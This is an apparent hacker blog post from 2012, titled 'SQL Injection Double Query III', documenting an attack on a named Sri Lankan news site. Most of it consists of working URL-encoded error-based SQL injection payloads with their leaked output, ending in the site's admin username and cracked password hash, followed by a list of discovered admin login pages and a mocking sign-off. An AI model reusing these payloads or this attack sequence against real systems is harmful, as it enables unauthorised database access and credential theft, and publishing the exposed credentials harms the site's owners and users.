Sabtu, 28 April 2012

SQL Injection Double Query III

POC

http://sundaytimes.lk/featurenews/articleXYZ100000010.php?id=152%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)


>>>Duplicate entry 'suntimes_suntimes~1' for key 1



http://sundaytimes.lk/featurenews/articleXYZ100000010.php?id=152%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%2022,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

>>>Duplicate entry 'users~1' for key 1


http://sundaytimes.lk/featurenews/articleXYZ100000010.php?id=152%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

Duplicate entry 'uname~1' for key 1


http://sundaytimes.lk/featurenews/articleXYZ100000010.php?id=152%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

>>>Duplicate entry 'password~1' for key 1


http://sundaytimes.lk/featurenews/articleXYZ100000010.php?id=152%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(uname,0x7e,password)%20as%20char),0x7e))%20from%20users%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

Duplicate entry 'admin~21232f297a57a5a743894a0e4a801fc3~1' for key 1



======================================
user : admin
pass : 21232f297a57a5a743894a0e4a801fc3 >>> admin
======================================


admin login >>>

[+] Found -> http://sundaytimes.lk/admin/


[+] Found -> http://sundaytimes.lk/administrator/


[+] Found -> http://sundaytimes.lk/moderator/


[+] Found -> http://sundaytimes.lk/webadmin/


[+] Found -> http://sundaytimes.lk/adminarea/


[+] Found -> http://sundaytimes.lk/bb-admin/


[+] Found -> http://sundaytimes.lk/adminLogin/


[+] Found -> http://sundaytimes.lk/admin_area/


[+] Found -> http://sundaytimes.lk/panel-administracion/


[+] Found -> http://sundaytimes.lk/instadmin/


[+] Found -> http://sundaytimes.lk/memberadmin/


[+] Found -> http://sundaytimes.lk/administratorlogin/


[+] Found -> http://sundaytimes.lk/adm/


[+] Found -> http://sundaytimes.lk/admin/account.html


[+] Found -> http://sundaytimes.lk/admin/index.html


[+] Found -> http://sundaytimes.lk/admin/login.html


[+] Found -> http://sundaytimes.lk/admin/admin.html


[+] Found -> http://sundaytimes.lk/admin_area/admin.html


[+] Found -> http://sundaytimes.lk/admin_area/login.html


[+] Found -> http://sundaytimes.lk/admin_area/index.html

[+] Found -> http://sundaytimes.lk/bb-admin/index.html


[+] Found -> http://sundaytimes.lk/bb-admin/login.html


[+] Found -> http://sundaytimes.lk/bb-admin/admin.html


[+] Found -> http://sundaytimes.lk/admin/home.html



[+] Found -> http://sundaytimes.lk/cp.html


[+] Found -> http://sundaytimes.lk/administrator/index.html


[+] Found -> http://sundaytimes.lk/administrator/login.html


[+] Found -> http://sundaytimes.lk/administrator/account.html


[+] Found -> http://sundaytimes.lk/administrator.html


[+] Found -> http://sundaytimes.lk/login.html


[+] Found -> http://sundaytimes.lk/modelsearch/login.html


[+] Found -> http://sundaytimes.lk/moderator.html


[+] Found -> http://sundaytimes.lk/moderator/login.html


[+] Found -> http://sundaytimes.lk/moderator/admin.html


[+] Found -> http://sundaytimes.lk/account.html


[+] Found -> http://sundaytimes.lk/controlpanel.html


[+] Found -> http://sundaytimes.lk/admincontrol.html


[+] Found -> http://sundaytimes.lk/admin_login.html




All of admin login Redirect to Home Lol...
hahaha :p

SQL Injection Double Query III Rating: 4.5 Diposkan Oleh: r007-

0 komentar:

Posting Komentar